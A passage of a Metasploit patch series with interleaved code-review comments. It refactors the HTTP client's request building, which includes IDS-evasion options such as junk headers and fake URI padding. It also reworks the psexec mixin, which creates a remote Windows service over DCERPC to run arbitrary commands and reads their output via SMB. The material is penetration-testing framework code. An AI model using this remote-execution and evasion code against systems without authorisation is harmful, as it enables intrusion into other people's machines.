"" : ":#{self.port}" - url << uri - end - - url - end - - # - # Return the HTTP method string - # - def set_method(method) - ret = method - - if (self.config['method_random_valid']) - ret = ['GET', 'POST', 'HEAD'][rand(3)] - end - - if (self.config['method_random_invalid']) - ret = Rex::Text.rand_text_alpha(rand(20)+1) - end - - if (self.config['method_random_case']) - ret = Rex::Text.to_rand_case(ret) - end - - ret - end - - # - # Return the HTTP version string - # - def set_version(protocol, version) - ret = protocol + "/" + version - - if (self.config['version_random_valid']) - ret = protocol + "/" + ['1.0', '1.1'][rand(2)] - end - - if (self.config['version_random_invalid']) - ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) - end - - if (self.config['version_random_case']) - ret = Rex::Text.to_rand_case(ret) - end - - ret << "\r\n" - end - - # - # Return the HTTP seperator and body string - # - def set_body(data) - return "\r\n" + data if self.config['chunked_size'] == 0 - str = data.dup - chunked = '' - while str.size > 0 - chunk = str.slice!(0,rand(self.config['chunked_size']) + 1) - chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" - end - "\r\n" + chunked + "0\r\n\r\n" - end - - # - # Return the HTTP path info - # TODO: - # * Encode path information - def set_path_info(path) - path ? 
path : '' - end - - # - # Return the spacing between the method and uri - # - def set_method_uri_spacer - len = self.config['pad_method_uri_count'].to_i - set = " " - buf = "" - - case self.config['pad_method_uri_type'] - when 'tab' - set = "\t" - when 'apache' - set = "\t \x0b\x0c\x0d" - end - - while(buf.length < len) - buf << set[ rand(set.length) ] - end - - return buf - end - - # - # Return the spacing between the uri and the version - # - def set_uri_version_spacer - len = self.config['pad_uri_version_count'].to_i - set = " " - buf = "" - - case self.config['pad_uri_version_type'] - when 'tab' - set = "\t" - when 'apache' - set = "\t \x0b\x0c\x0d" - end - - while(buf.length < len) - buf << set[ rand(set.length) ] - end - - return buf - end - - # - # Return the padding to place before the uri - # - def set_uri_prepend - prefix = "" - - if (self.config['uri_fake_params_start']) - prefix << '/%3fa=b/../' - end - - if (self.config['uri_fake_end']) - prefix << '/%20HTTP/1.0/../../' - end - - prefix - end - - # - # Return the padding to place before the uri - # - def set_uri_append - # TODO: - # * Support different padding types - "" - end - - # - # Return the HTTP Host header - # - def set_host_header(host=nil) - return "" if self.config['uri_full_url'] - host ||= self.config['vhost'] - - # IPv6 addresses must be placed in brackets - if Rex::Socket.is_ipv6?(host) - host = "[#{host}]" - end - - # The port should be appended if non-standard - if not [80,443].include?(self.port) - host = host + ":#{port}" - end - - set_formatted_header("Host", host) - end - - # - # Return the HTTP agent header - # - def set_agent_header(agent) - agent ? set_formatted_header("User-Agent", agent) : "" - end - - # - # Return the HTTP cookie header - # - def set_cookie_header(cookie) - cookie ? set_formatted_header("Cookie", cookie) : "" - end - - # - # Return the HTTP connection header - # - def set_connection_header(conn) - conn ? 
set_formatted_header("Connection", conn) : "" - end - - # - # Return the content type header - # - def set_content_type_header(ctype) - set_formatted_header("Content-Type", ctype) - end - - # - # Return the content length header - def set_content_len_header(clen) - return "" if self.config['chunked_size'] > 0 - set_formatted_header("Content-Length", clen) - end - # # Return the Authorization basic-auth header # @@ -1140,53 +793,6 @@ class Client auth ? set_formatted_header("Authorization", "Basic " + Rex::Text.encode_base64(auth)) : "" end - # - # Return a string of formatted extra headers - # - def set_extra_headers(headers) - buf = '' - - if (self.config['pad_fake_headers']) - 1.upto(self.config['pad_fake_headers_count'].to_i) do |i| - buf << set_formatted_header( - Rex::Text.rand_text_alphanumeric(rand(32)+1), - Rex::Text.rand_text_alphanumeric(rand(32)+1) - ) - end - end - - headers.each_pair do |var,val| - buf << set_formatted_header(var, val) - end - - buf - end - - def set_chunked_header() - return "" if self.config['chunked_size'] == 0 - set_formatted_header('Transfer-Encoding', 'chunked') - end - - # - # Return a string of raw header data - # - def set_raw_headers(data) - data - end - - # - # Return a formatted header string - # - def set_formatted_header(var, val) - if (self.config['header_folding']) - "#{var}:\r\n\t#{val}\r\n" - else - "#{var}: #{val}\r\n" - end - end - - - # # The client request configuration # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb new file mode 100644 index 0000000000..cb76327f2b --- /dev/null +++ b/lib/rex/proto/http/client_request.rb 
@@ -0,0 +1,454 @@ +# -*- coding: binary -*- +require 'uri' +require 'rex/proto/http' + +module Rex +module Proto +module Http + +class ClientRequest + + attr_accessor :authorization + attr_accessor :cgi + attr_accessor :config + attr_accessor :connection + attr_accessor :content_type + attr_accessor :cookie + attr_accessor :data + attr_accessor :encode + attr_accessor :encode_params + attr_accessor :headers + attr_accessor :host + attr_accessor :method + attr_accessor :path + attr_accessor :port + attr_accessor :protocol + attr_accessor :query + attr_accessor :raw_headers + attr_accessor :uri + attr_accessor :user_agent + attr_accessor :vars_get + attr_accessor :vars_post + attr_accessor :version + + def initialize(opts={}, client_config) + @cgi = opts['cgi'] + @config = client_config + @connection = opts['connection'] + @content_type = opts['ctype'] + @cookie = opts['cookie'] + @data = opts['data'] + @encode = opts['encode'] + @encode_params = opts['encode_params'] + @headers = opts['headers'] + @host = opts['vhost'] + @method = opts['method'] + @path = opts['path_info'] + @port = opts['port'] + @protocol = opts['proto'] + @query = opts['query'] + @raw_headers = opts['raw_headers'] + @uri = opts['uri'] + @user_agent = opts['agent'] + @vars_get = opts['vars_get'] + @vars_post = opts['vars_post'] + @version = opts['version'] + end + + def to_s + + # Start GET query string + qstr = query + + # Start POST data string + pstr = data + + if cgi == true + uri_str= set_cgi + + if (config['pad_get_params']) + 1.upto(config['pad_get_params_count'].to_i) do |i| + qstr << '&' if qstr.length > 0 + qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + qstr << '=' + qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + end + end + + vars_get.each_pair do |var,val| + qstr << '&' if qstr.length > 0 + qstr << (encode_params ? set_encode_uri(var) : var) + qstr << '=' + qstr << (encode_params ? 
set_encode_uri(val) : val) + end + + if (config['pad_post_params']) + 1.upto(config['pad_post_params_count'].to_i) do |i| + rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) + rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) + pstr << '&' if pstr.length > 0 + pstr << (encode_params ? set_encode_uri(rand_var) : rand_var) + pstr << '=' + pstr << (encode_params ? set_encode_uri(rand_val) : rand_val) + end + end + + vars_post.each_pair do |var,val| + pstr << '&' if pstr.length > 0 + pstr << (encode_params ? set_encode_uri(var) : var) + pstr << '=' + pstr << (encode_params ? set_encode_uri(val) : val) + end + else + uri_str = set_uri + if encode + qstr = set_encode_uri(qstr) + end + end + + req = '' + req << set_method + req << set_method_uri_spacer() + req << set_uri_prepend() + + if encode + req << set_encode_uri(uri_str) + else + req << uri_str + end + + + if (qstr.length > 0) + req << '?' + req << qstr + end + + req << set_path_info + req << set_uri_append() + req << set_uri_version_spacer() + req << set_version + req << set_host_header + + # If an explicit User-Agent header is set, then use that instead of the value of user_agent + unless headers.keys.map{|x| x.downcase }.include?('user-agent') + req << set_agent_header + end + + if authorization + req << set_auth_header + end + + req << set_cookie_header + req << set_connection_header + req << set_extra_headers + + req << set_content_type_header + req << set_content_len_header(pstr.length) + req << set_chunked_header() + req << raw_headers + req << set_body(pstr) + end + + protected + + def set_auth_header + "Authorization: " + authorization + end + + def set_uri + if (config['uri_dir_self_reference']) + uri.gsub!('/', '/./') + end + + if (config['uri_dir_fake_relative']) + buf = "" + uri.split('/').each do |part| + cnt = rand(8)+2 + 1.upto(cnt) { |idx| + buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) + } + buf << ("/.." 
* cnt) + buf << "/" + part + end + uri = buf + end + + if (config['uri_full_url']) + url = self.ssl ? "https" : "http" + url << self.config['vhost'] + url << ((self.port == 80) ? "" : ":#{self.port}") + url << uri + url + else + uri + end + end + + def set_cgi + uri_str = uri + if (config['uri_dir_self_reference']) + uri_str.gsub!('/', '/./') + end + + if (config['uri_dir_fake_relative']) + buf = "" + uri_str.split('/').each do |part| + cnt = rand(8)+2 + 1.upto(cnt) { |idx| + buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) + } + buf << ("/.." * cnt) + buf << "/" + part + end + uri_str = buf + end + + url = uri_str + + if (config['uri_full_url']) + url = self.ssl ? "https" : "http" + url << self.config['vhost'] + url << (self.port == 80) ? "" : ":#{self.port}" + url << uri_str + end + + url + end + + def set_encode_uri(str) + a = str + config['uri_encode_count'].times { + a = Rex::Text.uri_encode(a, config['uri_encode_mode']) + } + return a + end + + def set_method + ret = method + + if (config['method_random_valid']) + ret = ['GET', 'POST', 'HEAD'][rand(3)] + end + + if (config['method_random_invalid']) + ret = Rex::Text.rand_text_alpha(rand(20)+1) + end + + if (config['method_random_case']) + ret = Rex::Text.to_rand_case(ret) + end + + ret + end + + def set_method_uri_spacer + len = config['pad_method_uri_count'].to_i + set = " " + buf = "" + + case config['pad_method_uri_type'] + when 'tab' + set = "\t" + when 'apache' + set = "\t \x0b\x0c\x0d" + end + + while(buf.length < len) + buf << set[ rand(set.length) ] + end + + return buf + end + + # + # Return the padding to place before the uri + # + def set_uri_prepend + prefix = "" + + if (config['uri_fake_params_start']) + prefix << '/%3fa=b/../' + end + + if (config['uri_fake_end']) + prefix << '/%20HTTP/1.0/../../' + end + + prefix + end + + # + # Return the HTTP path info + # TODO: + # * Encode path information + def set_path_info + path ? 
path : '' + end + + # + # Return the padding to place before the uri + # + def set_uri_append + # TODO: + # * Support different padding types + "" + end + + # + # Return the spacing between the uri and the version + # + def set_uri_version_spacer + len = config['pad_uri_version_count'].to_i + set = " " + buf = "" + + case config['pad_uri_version_type'] + when 'tab' + set = "\t" + when 'apache' + set = "\t \x0b\x0c\x0d" + end + + while(buf.length < len) + buf << set[ rand(set.length) ] + end + + return buf + end + + # + # Return the HTTP version string + # + def set_version + ret = protocol + "/" + version + + if (config['version_random_valid']) + ret = protocol + "/" + ['1.0', '1.1'][rand(2)] + end + + if (config['version_random_invalid']) + ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) + end + + if (config['version_random_case']) + ret = Rex::Text.to_rand_case(ret) + end + + ret << "\r\n" + end + + # + # Return the HTTP Host header + # + def set_host_header + return "" if config['uri_full_url'] + host ||= config['vhost'] + + # IPv6 addresses must be placed in brackets + if Rex::Socket.is_ipv6?(host) + host = "[#{host}]" + end + + # The port should be appended if non-standard + if not [80,443].include?(port) + host = host + ":#{port}" + end + + set_formatted_header("Host", host) + end + + # + # Return the HTTP agent header + # + def set_agent_header + user_agent ? set_formatted_header("User-Agent", user_agent) : "" + end + + # + # Return a formatted header string + # + def set_formatted_header(var, val) + if (self.config['header_folding']) + "#{var}:\r\n\t#{val}\r\n" + else + "#{var}: #{val}\r\n" + end + end + + # + # Return the HTTP cookie header + # + def set_cookie_header + cookie ? set_formatted_header("Cookie", cookie) : "" + end + + # + # Return the HTTP connection header + # + def set_connection_header + connection ? 
set_formatted_header("Connection", connection) : "" + end + + # + # Return the content type header + # + def set_content_type_header + set_formatted_header("Content-Type", content_type) + end + + # + # Return the content length header + def set_content_len_header(clen) + return "" if config['chunked_size'] > 0 + set_formatted_header("Content-Length", clen) + end + + # + # Return a string of formatted extra headers + # + def set_extra_headers + buf = '' + + if (config['pad_fake_headers']) + 1.upto(config['pad_fake_headers_count'].to_i) do |i| + buf << set_formatted_header( + Rex::Text.rand_text_alphanumeric(rand(32)+1), + Rex::Text.rand_text_alphanumeric(rand(32)+1) + ) + end + end + + headers.each_pair do |var,val| + buf << set_formatted_header(var, val) + end + + buf + end + + def set_chunked_header + return "" if config['chunked_size'] == 0 + set_formatted_header('Transfer-Encoding', 'chunked') + end + + # + # Return the HTTP seperator and body string + # + def set_body(bdata) + return "\r\n" + bdata if config['chunked_size'] == 0 + str = bdata.dup + chunked = '' + while str.size > 0 + chunk = str.slice!(0,rand(config['chunked_size']) + 1) + chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" + end + "\r\n" + chunked + "0\r\n\r\n" + end + + +end + + + +end +end +end \ No newline at end of file From 87d9af585eada1536c65fdb7dc53759fb687f6a3 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Sun, 17 Feb 2013 21:35:19 -0600 Subject: [PATCH 10/87] fix request_raw --- lib/rex/proto/http/client.rb | 79 ++++++++-------------------- lib/rex/proto/http/client_request.rb | 15 ++++-- 2 files changed, 33 insertions(+), 61 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 690cd58f4d..0244a9eb3e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
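Review bot: In `set_host_header`, `host ||= config['vhost']` assigns to a bare name, which Ruby treats as a new local variable, so the `host` accessor (filled from `opts['vhost']` in `initialize`) is never consulted and the Host header always comes from `config['vhost']`. The removed `Client#set_host_header(host=nil)` took the value as a parameter, which is why the same line worked there; here it should read `vhost = host || config['vhost']` and use `vhost` in the lines below. Separately, `to_s` binds `qstr = query` and `pstr = data` and then appends with `<<`, so every call grows the stored strings and a second `to_s` on the same object repeats the parameters; `qstr = query.dup` and `pstr = data.dup` keep it repeatable.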
@@ -8,8 +8,6 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' -require 'pry' - module Rex module Proto module Http 
@@ -171,62 +169,27 @@ class Client # # @return [Request] def request_raw(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] - c_enc = opts['encode'] || false - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] || self.hostname - c_meth = opts['method'] || 'GET' - c_prot = opts['proto'] || 'HTTP' - c_qs = opts['query'] - c_rawh = opts['raw_headers']|| config['raw_headers'] || '' - c_uri = opts['uri'] || '/' - c_vers = opts['version'] || config['version'] || '1.1' + opts['agent'] ||= config['agent'] + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' + opts['cgi'] = false + opts['port'] = self.port - # An agent parameter was specified, but so was a header, prefer the header - if c_ag and c_head.keys.map{|x| x.downcase }.include?('user-agent') - c_ag = nil + if opts['basic_auth'] and not opts['authorization'] + opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - uri = set_uri(c_uri) - - req = '' - req << set_method(c_meth) - req << set_method_uri_spacer() - req << set_uri_prepend() - req << (c_enc ? set_encode_uri(uri) : uri) - - if (c_qs) - req << '?' - req << (c_enc ? 
set_encode_qs(c_qs) : c_qs) - end - - req << set_uri_append() - req << set_uri_version_spacer() - req << set_version(c_prot, c_vers) - req << set_host_header(c_host) - req << set_agent_header(c_ag) - - if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end - end - - req << set_cookie_header(c_cook) - req << set_connection_header(c_conn) - req << set_extra_headers(c_head) - req << set_raw_headers(c_rawh) - req << set_body(c_body) - - request = Request.new - request.parse(req) - request.options = opts - - request + req = ClientRequest.new(opts,self.config) end @@ -267,6 +230,10 @@ class Client opts['encode_params'] = false end + if opts['basic_auth'] and not opts['authorization'] + opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) + end + req = ClientRequest.new(opts,self.config) end @@ -322,7 +289,7 @@ class Client def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? - res = send_auth(res, req.options, t, persist) + res = send_auth(res, req.opts, t, persist) end res end diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index cb76327f2b..c24d9a8c4a 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -2,6 +2,7 @@ require 'uri' require 'rex/proto/http' + module Rex module Proto module Http @@ -31,6 +32,8 @@ class ClientRequest attr_accessor :vars_post attr_accessor :version + attr_reader :opts + def initialize(opts={}, client_config) @cgi = opts['cgi'] @config = client_config @@ -53,6 +56,7 @@ class ClientRequest @vars_get = opts['vars_get'] @vars_post = opts['vars_post'] @version = opts['version'] + @opts = opts end def to_s 
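Review bot: The guard `if opts['basic_auth'] and not opts['authorization']` in `request_raw` is always entered when the caller set no `'authorization'`, because `opts['basic_auth']` was just defaulted to `''` and an empty string is truthy in Ruby; the removed code tested `c_auth.length > 0`. The value stored is also the bare base64 text, without the `Basic ` scheme that `set_basic_auth_header` prepends, and `ClientRequest#set_auth_header` as shown in the previous patch adds none. I would write `unless opts['basic_auth'].empty? or opts['authorization']` and store `"Basic " + Rex::Text.encode_base64(opts['basic_auth'])`. The block added to `request_cgi` in the next hunk of this file has the same two problems.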
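Review bot: `initialize` now keeps `@opts`, but none of its visible lines assigns `@authorization`, so the `opts['authorization']` value that `request_raw` and `request_cgi` compute in this patch never reaches the `if authorization` test in `to_s` and no Authorization header is written. Adding `@authorization = opts['authorization']` next to `@opts = opts` closes that gap. Once it is reachable, `set_auth_header` returns `"Authorization: " + authorization` with no trailing CRLF, which would run into the next header; `set_formatted_header("Authorization", authorization)` gives it the same termination and folding as the others. The middle of `initialize` lies outside this hunk, so this is based on the method as it appears in the patch that created the file.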
@@ -156,13 +160,14 @@ class ClientRequest end def set_uri + uri_str = uri if (config['uri_dir_self_reference']) - uri.gsub!('/', '/./') + uri_str.gsub!('/', '/./') end if (config['uri_dir_fake_relative']) buf = "" - uri.split('/').each do |part| + uri_str.split('/').each do |part| cnt = rand(8)+2 1.upto(cnt) { |idx| buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) @@ -170,17 +175,17 @@ class ClientRequest buf << ("/.." * cnt) buf << "/" + part end - uri = buf + uri_str = buf end if (config['uri_full_url']) url = self.ssl ? "https" : "http" url << self.config['vhost'] url << ((self.port == 80) ? "" : ":#{self.port}") - url << uri + url << uri_str url else - uri + uri_str end end From b72d2b59f84ae70978f416c65cf303f5fa3007f0 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 18 Feb 2013 18:02:51 -0600 Subject: [PATCH 11/87] Add logging in case of exceptions during rm --- lib/msf/core/exploit/file_dropper.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 6298354b67..12ef03efb2 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -56,7 +56,7 @@ module Exploit::FileDropper # # Record file as needing to be cleaned up # - # @param [Array] files List of paths on the target that should + # @param files [Array] List of paths on the target that should # be deleted during cleanup. Each filename should be either a full # path or relative to the current working directory of the session # (not necessarily the same as the cwd of the server we're 
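Review bot: `uri_str = uri` in `set_uri` copies the reference, not the string, so the `uri_str.gsub!('/', '/./')` that follows still rewrites the stored `@uri` in place, and each further `to_s` call with `uri_dir_self_reference` set inserts more `/./` segments. `uri_str = uri.dup` (or the non-bang `uri_str = uri_str.gsub('/', '/./')`) leaves the object's state unchanged; `set_cgi` has the same aliasing. In the second hunk of this method, the context line `url = self.ssl ? "https" : "http"` calls `ssl`, which is not among the accessors `ClientRequest` declares in the visible part of the file, so the `uri_full_url` branch looks like it would raise NoMethodError unless `ssl` is defined elsewhere.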
@@ -95,7 +95,9 @@ module Exploit::FileDropper true #rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE, ::Rex::Post::Meterpreter::RequestError => e rescue ::Exception => e - vprint_error("Failed to delete #{file}: #{e.to_s}") + vprint_error("Failed to delete #{file}: #{e}") + elog("Failed to delete #{file}: #{e.class}: #{e}") + elog("Call stack:\n#{e.backtrace.join("\n")}") false end end From 867ab2f269365d7c0de0591c2a96e64c7928d5d9 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 18 Feb 2013 19:01:03 -0600 Subject: [PATCH 12/87] Whitespace --- lib/rex/proto/smb/client.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index bec1ff50d5..72c35379fb 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1899,7 +1899,7 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils resp = find_next(last_search_id, last_offset, last_filename) search_next = 1 # Flip bit so response params will parse correctly end - end until eos != 0 or last_offset == 0 + end until eos != 0 or last_offset == 0 rescue ::Exception raise $! end From 49f00acc1187f38a55fcaa5cd31b081575dc19b3 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 19 Feb 2013 11:24:05 -0600 Subject: [PATCH 13/87] Fix nil deref when dnsdomain is empty --- modules/auxiliary/scanner/smb/psexec_loggedin_users.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 7ed1b96f4d..ca6c2f5c2f 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb 
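Review bot: The new `elog` lines sit under `rescue ::Exception => e`, which also catches `Interrupt` and `SystemExit`, so a Ctrl-C or a shutdown during cleanup is logged as a failed delete and then swallowed by the `false` return. `rescue ::StandardError => e` keeps the logging for real errors while letting those two propagate; the commented-out line above it already lists a narrower set of classes. The enclosing method starts outside this hunk.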
@@ -164,8 +164,10 @@ class Metasploit3 < Msf::Auxiliary print_good("#{peer} - #{user}") report_user(user.chomp) else - if username = query_session(smbshare, ip, cmd, text, bat) - user = dnsdomain.split(" ")[2].split(".")[0].to_s + "\\" + username.to_s + username = query_session(smbshare, ip, cmd, text, bat) + if username + hostname = (dnsdomain.split(" ")[2] || "").split(".")[0] || "." + user = "#{hostname}\\#{username}" print_good("#{peer} - #{user}") report_user(user.chomp) else @@ -175,7 +177,7 @@ class Metasploit3 < Msf::Auxiliary else print_status("#{peer} - Could not determine logged in users") end - rescue StandardError => check_error + rescue Rex::Proto::SMB::Exceptions::Error => check_error print_error("#{peer} - Error checking reg key. #{check_error.class}. #{check_error}") return check_error end From ede804e6affa6ae24e8c62a22e01430b3e6d6aed Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 19 Feb 2013 12:33:19 -0600 Subject: [PATCH 14/87] Make psexec mixin a bit better * Removes copy-pasted code from psexec_command module and uses the mixin instead * Uses the SMB protocol to delete files rather than psexec'ing to call cmd.exe and del * Replaces several instances of "rescue StandardError" with better exception handling so we don't accidentally swallow things like NoMethodError * Moves file reading and existence checking into the Exploit::SMB mixin --- lib/msf/core/exploit/psexec.rb | 139 ++++------- lib/msf/core/exploit/smb.rb | 66 +++++- modules/auxiliary/admin/smb/psexec_command.rb | 221 ++++-------------- 3 files changed, 149 insertions(+), 277 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index f63a93f8e1..58e6788695 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb 
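Review bot: The new `(dnsdomain.split(" ")[2] || "")` guard covers a value with fewer than three tokens, but `dnsdomain.split` itself still raises NoMethodError if `dnsdomain` is nil, and the second hunk narrows the `rescue` to `Rex::Proto::SMB::Exceptions::Error`, so that error would no longer be caught here. Whether `dnsdomain` can be nil is decided outside the hunk; if it can, `dnsdomain.to_s.split(" ")[2].to_s.split(".")[0] || "."` handles both cases. When the third token is missing the host part becomes `"."`, which `report_user` then records as part of the user name; a short comment saying that `.` is the intended fallback would help the next reader.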
@@ -1,11 +1,14 @@ require 'msf/core' +require 'msf/core/exploit/dcerpc' module Msf #### -# This module alows for reuse of the psexec code execution module -# This code was stolen straight out of psexec.rb.Thanks very much for all -# who contributed to that module!! Instead of uploading and runing a binary. +# Allows for reuse of the psexec code execution technique +# +# This code was stolen straight out of the psexec module. Thanks very +# much for all who contributed to that module!! Instead of uploading +# and runing a binary. #### module Exploit::Remote::Psexec 
@@ -13,34 +16,42 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - # Retrives output from the executed command + # # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param file [File name] Path to the output file relative to the smbshare - # Example: '\WINDOWS\Temp\outputfile.txt' - # @return output or nil if fails - def get_output(smbshare, ip, file) + # @param host [String] Remote host to connect to, as an IP address or + # hostname + # @param file [String] Path to the output file relative to the smbshare + # Example: '\WINDOWS\Temp\outputfile.txt' + # @return [String,nil] output or nil on failure + def smb_read_file(smbshare, host, file) begin - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return output - rescue Rex::Proto::SMB::Exceptions::ErrorCode => output_error - print_error("#{peer} - The file #{file} doesn't exist. #{output_error}.") + simple.connect("\\\\#{host}\\#{smbshare}") + file = simple.open(file, 'ro') + contents = file.read + file.close + simple.disconnect("\\\\#{host}\\#{smbshare}") + return contents + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.") return nil end end - # This method executes a single windows command. If you want to - # retrieve the output of your command you'll have to echo it - # to a .txt file and then use the get_output method to retrieve it - # Make sure to use the cleanup_after method when you are done. + # Executes a single windows command. + # + # If you want to retrieve the output of your command you'll have to + # echo it to a .txt file and then use the {#smb_read_file} method to + # retrieve it. 
Make sure to remove the files manually or use + # {Exploit::FileDropper#register_files_for_cleanup} to have the + # {Exploit::FileDropper#cleanup} and + # {Exploit::FileDropper#on_new_session} handlers do it for you. + # + # @todo Figure out the actual exceptions this needs to deal with + # instead of all the ghetto "rescue ::Exception" madness # @param command [String] Should be a valid windows command - # @return true if everything wen't well + # @return [Boolean] Whether everything went well def psexec(command) simple.connect("\\\\#{datastore['RHOST']}\\IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) @@ -49,8 +60,7 @@ module Exploit::Remote::Psexec vprint_status("#{peer} - Bound to #{handle} ...") vprint_status("#{peer} - Obtaining a service manager handle...") scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) + stubdata = NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) begin response = dcerpc.call(0x0f, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil 
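Review bot: `smb_read_file` reuses the `file` parameter for the handle returned by `simple.open`, and nothing runs `file.close` or `simple.disconnect` when `read` raises, so a failed read leaves the share connected and the `rescue` message interpolates the handle object instead of the path. A separate local for the handle plus `ensure` blocks fixes both, as in the sketch below. The first comment line of the method is now a bare `#`; a summary sentence such as `# Reads a file from an SMB share on the remote host` should be restored so the generated documentation has a description.

```ruby
def smb_read_file(smbshare, host, file)
  share = "\\\\#{host}\\#{smbshare}"
  simple.connect(share)
  begin
    fd = simple.open(file, 'ro')
    begin
      fd.read
    ensure
      fd.close
    end
  ensure
    simple.disconnect(share)
  end
rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
  print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.")
  nil
end
```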
@@ -66,19 +76,19 @@ module Exploit::Remote::Psexec svc_handle = nil svc_status = nil stubdata = - scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password + scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + NDR.long(0x0F01FF) + # Access: MAX + NDR.long(0x00000110) + # Type: Interactive, Own process + NDR.long(0x00000003) + # Start: Demand + NDR.long(0x00000000) + # Errors: Ignore + NDR.wstring( command ) + + NDR.long(0) + # LoadOrderGroup + NDR.long(0) + # Dependencies + NDR.long(0) + # Service Start + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) # Password begin vprint_status("#{peer} - Creating the service...") response = dcerpc.call(0x0c, stubdata) @@ -97,8 +107,7 @@ module Exploit::Remote::Psexec end vprint_status("#{peer} - Opening service...") begin - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) + stubdata = scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) response = dcerpc.call(0x10, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil svc_handle = dcerpc.last_response.stub_data[0,20] @@ -108,8 +117,7 @@ module Exploit::Remote::Psexec return false end vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + NDR.long(0) + NDR.long(0) + stubdata = svc_handle + NDR.long(0) + NDR.long(0) begin response = dcerpc.call(0x13, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil 
